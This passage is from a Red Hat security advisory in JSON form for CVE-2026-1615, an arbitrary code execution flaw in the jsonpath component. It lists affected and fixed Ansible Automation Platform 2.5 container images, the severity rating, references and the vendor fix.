"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437875"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the jsonpath component. This vulnerability allows a remote attacker to achieve arbitrary code execution by supplying a malicious JSON Path expression. The component\u0027s reliance on the `static-eval` module for processing user-supplied input leads to unsafe evaluation. Successful exploitation can result in Remote Code Execution (RCE) in Node.js environments or Cross-site Scripting (XSS) in browser contexts.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jsonpath: jsonpath: Arbitrary Code Execution via unsafe JSON Path expression evaluation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Product Security team has rated this vulnerability as Important as it may allows arbitrary code execution when processing untrusted JSON Path expressions. This can lead to Remote Code Execution in Node.js environments or Cross-site Scripting in browser contexts. In some contexts it may be possible to remotely exploit this flaw without any privileges. However, within Red Hat products the jsonpath component is used as a transitive dependency or does not directly handle user input. This context reduces exposure and criticality of this vulnerability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-1615"
},
{
"category": "external",
"summary": "RHBZ#2437875",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437875"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-1615",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1615"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1615",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1615"
},
{
"category": "external",
"summary": "https://github.com/dchester/jsonpath/blob/c1dd8ec74034fb0375233abb5fdbec51ac317b4b/lib/handlers.js%23L243",
"url": "https://github.com/dchester/jsonpath/blob/c1dd8ec74034fb0375233abb5fdbec51ac317b4b/lib/handlers.js%23L243"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-15141219",
"url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-15141219"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JS-JSONPATH-13645034",
"url": "https://security.snyk.io/vuln/SNYK-JS-JSONPATH-13645034"
}
],
"release_date": "2026-02-09T05:00:09.050000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T22:34:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.5#Upgrading",
"product_ids": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6308"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
